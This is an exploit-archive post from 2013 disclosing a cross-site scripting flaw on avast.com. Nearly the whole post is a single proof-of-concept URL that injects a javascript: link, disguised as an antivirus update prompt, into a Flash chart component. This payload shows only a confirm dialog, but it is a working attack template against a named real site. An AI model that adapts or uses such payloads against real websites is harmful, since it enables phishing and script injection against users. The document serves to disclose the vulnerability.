Home / exploits Avast.com Cross Site Scripting
Posted on 24 December 2013
XSS proof of concept: http://www.avast.com/amcolumn/amcolumn.swf?chart_settings=<settings></settings>&chart_data=<chart><message><![CDATA[<a href="javascript:confirm('An attacker can include malicious code here.')">Click here to update your antivirus</a>]]></message></chart>&.swf
